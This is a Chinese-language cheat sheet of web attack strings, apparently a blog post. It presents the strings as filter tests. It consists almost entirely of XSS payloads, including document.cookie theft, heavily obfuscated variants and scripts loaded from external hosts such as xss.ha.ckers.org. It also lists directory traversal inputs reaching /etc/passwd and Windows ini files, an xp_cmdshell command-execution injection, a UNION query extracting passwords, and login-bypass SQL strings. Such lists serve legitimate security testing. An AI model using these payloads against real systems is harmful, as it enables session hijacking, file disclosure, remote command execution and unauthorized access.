XSS跨站测试代码

XSS跨站测试代码(下列测试字符串除XSS外,还混有目录遍历和SQL注入的测试输入,可用于检查输入过滤与输出编码是否生效)

'><script>alert(document.cookie)</script>
=' ><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert( 'XSS' )%3C/script%3E
<script>alert( 'XSS' )</script>
<img src= "javascript:alert('XSS')" >
%0a%0a<script>alert(\ "Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
" ><script>alert( 'Vulnerable' )</script>
';exec%20master..xp_cmdshell%20' dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt '--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
' ';!--"<XSS>=&{()}
<IMG src="javascript:alert(' XSS ');">
<IMG src=javascript:alert(' XSS ')>
<IMG src=JaVaScRiPt:alert(' XSS ')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert(' XSS ')>
<IMG src=javascript:alert(' XSS ')>
<IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG src="jav ascript:alert(' XSS ');">
<IMG src="jav ascript:alert(' XSS ');">
<IMG src="jav ascript:alert(' XSS ');">
"<IMG src=java\0script:alert(\"XSS\")>";'  > out
<IMG src= " javascript:alert('XSS');" >
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND= "javascript:alert('XSS')" >
<BODY ONLOAD=alert( 'XSS' )>
<IMG DYNSRC= "javascript:alert('XSS')" >
<IMG LOWSRC= "javascript:alert('XSS')" >
<BGSOUND src= "javascript:alert('XSS');" >
<br size= "&{alert('XSS')}" >
<LAYER src= "http://xss.ha.ckers.org/a.js" ></layer>
<LINK REL= "stylesheet"  href= "javascript:alert('XSS');" >
<IMG src= 'vbscript:msgbox("XSS")' >
<IMG src= "mocha:[code]" >
<IMG src= "livescript:[code]" >
<META HTTP-EQUIV= "refresh"  CONTENT= "0;url=javascript:alert('XSS');" >
<IFRAME src=javascript:alert( 'XSS' )></IFRAME>
<FRAMESET><FRAME src=javascript:alert( 'XSS' )></FRAME></FRAMESET>
<TABLE BACKGROUND= "javascript:alert('XSS')" >
<DIV STYLE= "background-image: url(javascript:alert('XSS'))" >
<DIV STYLE= "behaviour: url('http://www.how-to-hack.org/exploit.html');" >
<DIV STYLE= "width: expression(alert('XSS'));" >
<STYLE>@im\port '\ja\vasc\ript:alert("XSS")' ;</STYLE>
<IMG STYLE= 'xss:expre\ssion(alert("XSS"))' >
<STYLE TYPE= "text/javascript" >alert( 'XSS' );</STYLE>
<STYLE TYPE= "text/css" >.XSS{background-image:url( "javascript:alert('XSS')" );}</STYLE><A  class = "XSS" ></A>
<STYLE type= "text/css" >BODY{background:url( "javascript:alert('XSS')" )}</STYLE>
<BASE href= "javascript:alert('XSS');//" >
getURL( "javascript:alert('XSS')" )
a= "get" ;b= "URL" ;c= "javascript:" ;d= "alert('XSS');" ;eval(a+b+c+d);
<XML src= "javascript:alert('XSS');" >
"> <BODY ONLOAD=" a(); "><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT src= "http://xss.ha.ckers.org/xss.jpg" ></SCRIPT>
<IMG src= "javascript:alert('XSS')"
<!-- #exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<IMG src= "http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" >
<SCRIPT a= ">"  src= "http://xss.ha.ckers.org/a.js" ></SCRIPT>
<SCRIPT = ">"  src= "http://xss.ha.ckers.org/a.js" ></SCRIPT>
<SCRIPT a= ">"  ''  src= "http://xss.ha.ckers.org/a.js" ></SCRIPT>
<SCRIPT  "a='>'"  src= "http://xss.ha.ckers.org/a.js" ></SCRIPT>
<SCRIPT>document.write( "<SCRI" );</SCRIPT>PT src= "http://xss.ha.ckers.org/a.js" ></SCRIPT>
<A href=http: //www.gohttp://www.google.com/ogle.com/>link</A>
admin '--
'  or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
"  or 0=0  #
or 0=0  #
' or  'x' = 'x
" or "x"="x
' ) or ( 'x' = 'x
'  or 1=1--
" or 1=1--
or 1=1--
' or a=a--
"  or  "a" = "a
') or ('a'='a
" ) or ( "a" = "a
hi"  or  "a" = "a
hi"  or 1=1 --
hi' or 1=1 --
hi ' or ' a '=' a
hi ') or (' a '=' a
hi ") or (" a "=" a
